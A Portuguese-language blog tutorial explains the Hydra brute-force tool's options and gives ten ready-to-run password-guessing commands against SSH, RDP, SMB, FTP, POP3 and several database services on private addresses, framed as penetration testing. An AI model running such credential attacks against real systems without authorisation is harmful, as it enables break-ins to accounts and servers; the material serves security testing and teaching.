Hydra: Ferramenta de Ataque de Força Bruta para Teste de Segurança em Portas de Rede

Introdução ao Hydra

O Hydra é uma ferramenta open source de teste de penetracão para força bruta, amplamente utilizada em distribuições como Kali Linux. Ela permite testar a segurança de diversos serviços, como autenticação web, bancos de dados, SSH, FTP, entre outros, tentando combinações de usuários e senhas.

Parâmetros Básicos do Hydra

Antes de iniciar os testes, é essencial conhecer os principais parâmetros da ferramenta:

  • -s: Define a porta de destino.
  • -l: Especifica um único nome de usuário.
  • -L: Fornece um arquivo de dicionário com nomes de usuários.
  • -p: Define uma única senha para teste.
  • -P: Fornece um arquivo de dicionário com senhas.
  • -o: Salva os resultados em um arquivo.
  • -e: Habilita tentativas de senha vazia ou com o nome de usuário (ns).
  • -C: Permite especificar credenciais no formato usuario:senha.
  • -vV: Exibe o processo detalhado durante a execução.

Exemplos Práticos de Uso

Abra o terminal em um sistema Kali Linux e execute os comandos a seguir para testar diferentes protocolos.

1. Teste de Força Bruta em SSH (Porta 22)

Utilize dicionários de usuários e senhas para tentar autenticação via SSH.

hydra -L /home/teste/users.txt -P /home/teste/passwords.txt 10.0.0.50 ssh

Para acesar o serviço após sucesso, use: ssh usuario@10.0.0.50

2. Teste de Toça Bruta em RDP (Porta 3389)

Teste credenciais para acesso remoto via Remote Desktop Protocol.

hydra -l admin -P /home/teste/passwords.txt 10.0.0.51 rdp -vV

Acesse com: rdesktop 10.0.0.51:3389

3. Teste de Força Bruta em SMB (Porta 445)

Faça testes de autenticação para compartilhamentos de arquivos SMB.

hydra -l guest -P /home/teste/passwords.txt 10.0.0.52 smb

4. Teste de Força Bruta em POP3 (Porta 110)

Verifique a segurança de servidores de e-mail usando o protocolo POP3.

hydra -L /home/teste/users.txt -P /home/teste/passwords.txt 10.0.0.53 pop3 -vV

5. Teste de Força Bruta em FTP (Porta 21)

Teste credenciais de acesso a servidores FTP.

hydra -L /home/teste/users.txt -P /home/teste/passwords.txt 10.0.0.54 ftp -vV

6. Teste de Força Bruta em MSSQL (Porta 1433)

Ataque de dicionário contra bancos de dados Microsoft SQL Server.

hydra -l sa -P /home/teste/passwords.txt 10.0.0.55 mssql -vV

7. Teste de Força Bruta em MySQL (Porta 3306)

Teste a segurança de bancos de dados MySQL.

hydra -L /home/teste/users.txt -P /home/teste/passwords.txt 10.0.0.56 mysql -vV

8. Teste de Força Bruta em Oracle (Porta 1521)

Realize testes em bancos de dados Oracle.

hydra -L /home/teste/users.txt -P /home/teste/passwords.txt 10.0.0.57 oracle -vV

9. Teste de Força Bruta em Redis (Porta 6379)

Avalie a proteção de servidores Redis contra acessos não autorizados.

hydra -L /home/teste/users.txt -P /home/teste/passwords.txt 10.0.0.58 redis -vV

10. Teste de Toça Bruta em PostgreSQL (Porta 5432)

Teste credenciais para bancos de dados PostgreSQL.

hydra -L /home/teste/users.txt -P /home/teste/passwords.txt 10.0.0.59 postgresql -vV

Tags: Hydra teste de penetracao força bruta segurança de portas Kali Linux

Publicado em 6-10 03:19 por Thomas

Tags em Destaque

©2026 Doido Dev